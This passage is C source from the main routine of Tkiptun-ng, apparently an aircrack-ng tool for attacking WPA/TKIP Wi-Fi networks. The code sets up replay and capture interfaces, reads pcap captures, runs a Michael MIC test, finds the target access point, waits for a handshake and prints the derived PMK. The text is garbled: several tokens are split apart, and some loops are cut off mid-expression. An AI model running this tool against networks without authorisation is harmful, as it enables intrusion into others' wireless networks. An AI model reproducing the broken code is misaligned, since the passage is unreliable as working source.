default : goto usage; } } if( argc - optind != 1 ) { if(argc == 1) { usage: printf( usage, getVersion("Tkiptun-ng", _MAJ, _MIN, _SUB_MIN, _R EVISION, _BETA) ); } if( argc - optind == 0) { printf("No replay interface specified.\n"); } if(argc > 1) { printf("\"%s --help\" for help.\n", argv[0]); } return( 1 ); } if( !opt.r_smac_set ) { printf( "A Client MAC must be specified (-h).\n"); printf("\"%s --help\" for help.\n", argv[0]); return( 1 ); } if( (opt.f_minlen > 0 && opt.f_maxlen > 0) && opt.f_minlen > opt.f_maxlen ) { printf( "Invalid length filter (min(-m):%d > max(-n):%d).\n", opt.f_minlen, opt.f_maxlen ); printf("\"%s --help\" for help.\n", argv[0]); return( 1 ); } if ( opt.f_tods == 1 && opt.f_fromds == 1 ) { printf( "FromDS and ToDS bit are set: packet has to come from the AP and go to the AP\n" ); } dev.fd_rtc = -1; /* open the RTC device if necessary */ #if defined(__i386__) #if defined(linux) if( ( dev.fd_rtc = open( "/dev/rtc0", O_RDONLY ) ) < 0 ) { dev.fd_rtc = 0; } if( (dev.fd_rtc == 0) && ( ( dev.fd_rtc = open( "/dev/rtc", O_RDONLY ) ) < 0 ) ) { dev.fd_rtc = 0;
} if(dev.fd_rtc > 0) { if( ioctl( dev.fd_rtc, RTC_IRQP_SET, RTC_RESOLUTION ) < 0 ) { perror( "ioctl(RTC_IRQP_SET) failed" ); printf( "Make sure enhanced rtc device support is enabled in the kernel (module\n" "rtc, not genrtc) - also try 'echo 1024 >/proc/sys/dev/rtc/max-user-freq'.\n" ); close( dev.fd_rtc ); dev.fd_rtc = -1; } else { if( ioctl( dev.fd_rtc, RTC_PIE_ON, 0 ) < 0 ) { perror( "ioctl(RTC_PIE_ON) failed" ); close( dev.fd_rtc ); dev.fd_rtc = -1; } } } else { printf( "For information, no action required:" " Using gettimeofday() instead of /dev/rtc\n" ); dev.fd_rtc = -1; } #endif /* linux */ #endif /* i386 */ opt.iface_out = argv[optind]; opt.port_out = get_ip_port(opt.iface_out, opt.ip_out, sizeof(opt.ip_out)-1); //don't open interface(s) when using test mode and airserv if( ! (opt.a_mode == 9 && opt.port_out >= 0 ) ) { /* open the replay interface */ _wi_out = wi_open(opt.iface_out); if (!_wi_out) return 1; dev.fd_out = wi_fd(_wi_out); /* open the packet source */ if( opt.s_face != NULL ) { //don't open interface(s) when using test mode and airserv if( ! (opt.a_mode == 9 && opt.port_in >= 0 ) ) { _wi_in = wi_open(opt.s_face); if (!_wi_in) return 1; dev.fd_in = wi_fd(_wi_in); wi_get_mac(_wi_in, dev.mac_in); } } else { _wi_in = _wi_out;
dev.fd_in = dev.fd_out; /* XXX */ dev.arptype_in = dev.arptype_out; wi_get_mac(_wi_in, dev.mac_in); } wi_get_mac(_wi_out, dev.mac_out); } /* drop privileges */ setuid( getuid() ); /* XXX */ if( opt.r_nbpps == 0 ) { opt.r_nbpps = 10; } if( opt.s_file != NULL ) { if( ! ( dev.f_cap_in = fopen( opt.s_file, "rb" ) ) ) { perror( "open failed" ); return( 1 ); } n = sizeof( struct pcap_file_header ); if( fread( &dev.pfh_in, 1, n, dev.f_cap_in ) != (size_t) n ) { perror( "fread(pcap file header) failed" ); return( 1 ); } if( dev.pfh_in.magic != TCPDUMP_MAGIC && dev.pfh_in.magic != TCPDUMP_CIGAM ) { fprintf( stderr, "\"%s\" isn't a pcap file (expected " "TCPDUMP_MAGIC).\n", opt.s_file ); return( 1 ); } if( dev.pfh_in.magic == TCPDUMP_CIGAM ) SWAP32(dev.pfh_in.linktype); if( dev.pfh_in.linktype != LINKTYPE_IEEE802_11 && dev.pfh_in.linktype != LINKTYPE_PRISM_HEADER ) { fprintf( stderr, "Wrong linktype from pcap file header " "(expected LINKTYPE_IEEE802_11) -\n" "this doesn't look like a regular 802.11 " "capture.\n" ); return( 1 ); } } //if there is no -h given, use default hardware mac if( maccmp( opt.r_smac, NULL_MAC) == 0 )
{ memcpy( opt.r_smac, dev.mac_out, 6); if(opt.a_mode != 0 && opt.a_mode != 4 && opt.a_mode != 9) { printf("No source MAC (-h) specified. Using the device MAC (%02X:%02 X:%02X:%02X:%02X:%02X)\n", dev.mac_out[0], dev.mac_out[1], dev.mac_out[2], dev.mac_out[ 3], dev.mac_out[4], dev.mac_out[5]); } } if( maccmp( opt.r_smac, dev.mac_out) != 0 && maccmp( opt.r_smac, NULL_MAC) ! = 0) { // if( dev.is_madwifi && opt.a_mode == 5 ) printf("For --fragment to work on madwifi[-ng], set the interface MAC according to (-h)!\n"); fprintf( stderr, "The interface MAC (%02X:%02X:%02X:%02X:%02X:%02X)" " doesn't match the specified MAC (-h).\n" "\tifconfig %s hw ether %02X:%02X:%02X:%02X:%02X:%02X\n", dev.mac_out[0], dev.mac_out[1], dev.mac_out[2], dev.mac_out[3], dev.mac_out[4], dev.mac_out[5], opt.iface_out, opt.r_smac[0], opt.r_smac[1], opt.r_smac[2], opt .r_smac[3], opt.r_smac[4], opt.r_smac[5] ); } /* DO MICHAEL TEST */ bzero(buf, 128); memcpy(buf, "M", 1); i = michael_test((unsigned char*)"\x82\x92\x5c\x1c\xa1\xd1\x30\xb8", (unsign ed char*)buf, strlen(buf), (unsigned char*)"\x43\x47\x21\xca\x40\x63\x9b\x3f"); PCT; printf("Michael Test: %s\n", i ? "Successful" : "Failed"); /* END MICHAEL TEST*/ if(getnet(NULL, 0, 0) != 0) return 1; PCT; printf("Found specified AP\n"); got_hdsk=0; while(1) { getHDSK(); for(i=0; i 1) { calc_pmk(opt.psk, opt.r_essid, opt.pmk);
PCT; printf("PSK: %s\n", opt.psk); PCT; printf("PMK: "); for(i=0; i
